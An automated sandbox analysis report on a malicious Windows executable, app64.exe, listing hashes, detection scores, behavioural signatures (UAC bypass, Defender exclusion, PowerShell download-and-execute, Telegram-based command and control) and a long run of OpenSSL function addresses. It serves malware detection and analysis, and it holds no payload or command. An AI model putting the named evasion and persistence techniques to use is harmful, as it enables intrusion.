Windows Analysis Report
app64.exe

Overview

General Information

Sample name: app64.exe
Analysis ID: 1545289
MD5: 40b887735996fc88f47650c322273a25
SHA1: e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256: d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
Tags: exeuser-NDA0E

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: C:\Windows\System32\x590769.dat ReversingLabs: Detection: 54%
Source: app64.exe ReversingLabs: Detection: 26%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\System32\x590769.dat Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A935C5A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93225B0 OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A93225B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932A850 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A932A850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9328850 CRYPTO_realloc, 28_2_00007FF8A9328850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D8812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new, 28_2_00007FF8A92D8812
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9324800 OPENSSL_LH_delete,CRYPTO_free, 28_2_00007FF8A9324800
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D2860 CRYPTO_zalloc,InitializeCriticalSection, 28_2_00007FF8A92D2860
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931E810 CRYPTO_zalloc, 28_2_00007FF8A931E810
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F4840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock, 28_2_00007FF8A92F4840
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FA8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free, 28_2_00007FF8A92FA8B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DE880 CRYPTO_THREAD_run_once, 28_2_00007FF8A92DE880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9342880 CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9342880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free, 28_2_00007FF8A935C890
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93168B0 CRYPTO_zalloc,CRYPTO_free, 28_2_00007FF8A93168B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A935A8B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9322740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free, 28_2_00007FF8A9322740
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D8720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92D8720
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DE700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92DE700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9320770 CRYPTO_clear_free,CRYPTO_free, 28_2_00007FF8A9320770
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931C700 CRYPTO_malloc,memcmp,memcpy,memcpy, 28_2_00007FF8A931C700
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E730 CRYPTO_free, 28_2_00007FF8A932E730
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93267D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts, 28_2_00007FF8A93267D1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93207D0 CRYPTO_malloc,memcpy,CRYPTO_free, 28_2_00007FF8A93207D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A931A7D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free, 28_2_00007FF8A934C7E0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D27F0 DeleteCriticalSection,CRYPTO_free, 28_2_00007FF8A92D27F0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932E790 CRYPTO_free, 28_2_00007FF8A932E790
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93327B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A93327B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A932DA40 CRYPTO_memcmp, 28_2_00007FF8A932DA40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug, 28_2_00007FF8A92D9A20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311A60 CRYPTO_free, 28_2_00007FF8A9311A60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E3A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92E3A70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3A70 CRYPTO_get_ex_data, 28_2_00007FF8A92F3A70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free, 28_2_00007FF8A92DDA50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 28_2_00007FF8A934BAA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92E1950 CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92E1950
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9337920
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 28_2_00007FF8A9349985
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 28_2_00007FF8A934999C
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93079D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A93079D0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93119A0 CRYPTO_malloc, 28_2_00007FF8A93119A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A93499B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A93499B3
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9359C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A9359C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EBC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 28_2_00007FF8A92EBC10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9341C70 CRYPTO_realloc, 28_2_00007FF8A9341C70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1C50 CRYPTO_zalloc, 28_2_00007FF8A92D1C50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D9C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 28_2_00007FF8A92D9C50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D3C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A92D3C40
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A9323C30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy, 28_2_00007FF8A9349CC1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A933FC90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free, 28_2_00007FF8A9349CAA
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9CC0 EVP_MAC_CTX_free,CRYPTO_free, 28_2_00007FF8A92F9CC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A930FCB0 CRYPTO_free, 28_2_00007FF8A930FCB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9349B4A
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931BB00 CRYPTO_free, 28_2_00007FF8A931BB00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F7B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug, 28_2_00007FF8A92F7B50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free, 28_2_00007FF8A9349B33
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 28_2_00007FF8A92D7BEE
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1BE0 CRYPTO_zalloc, 28_2_00007FF8A92D1BE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92DDE10 i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 28_2_00007FF8A92DDE10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9309E60 OPENSSL_LH_free,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 28_2_00007FF8A9309E60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F9E00 CRYPTO_zalloc,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free, 28_2_00007FF8A92F9E00
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311E70 CRYPTO_realloc, 28_2_00007FF8A9311E70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9323E10 CRYPTO_malloc,CRYPTO_free, 28_2_00007FF8A9323E10
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3E50 CRYPTO_free,CRYPTO_memdup, 28_2_00007FF8A92F3E50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325E20 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A9325E20
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9327EC0 CRYPTO_zalloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 28_2_00007FF8A9327EC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92FDEA0 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free, 28_2_00007FF8A92FDEA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9345E80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,memcpy,EVP_MD_get0_name,EVP_MD_is_a,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug, 28_2_00007FF8A9345E80
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9337E90 CRYPTO_malloc,COMP_expand_block, 28_2_00007FF8A9337E90
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D1EC0 CRYPTO_free, 28_2_00007FF8A92D1EC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A931BD60 CRYPTO_zalloc, 28_2_00007FF8A931BD60
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92F3D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free, 28_2_00007FF8A92F3D70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9325D30 CRYPTO_free, 28_2_00007FF8A9325D30
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D5DB0 CRYPTO_malloc, 28_2_00007FF8A92D5DB0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92D7DA0 CRYPTO_free, 28_2_00007FF8A92D7DA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A933DDE0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug, 28_2_00007FF8A933DDE0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9349DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free, 28_2_00007FF8A9349DA6
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A934BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 28_2_00007FF8A934BDB0
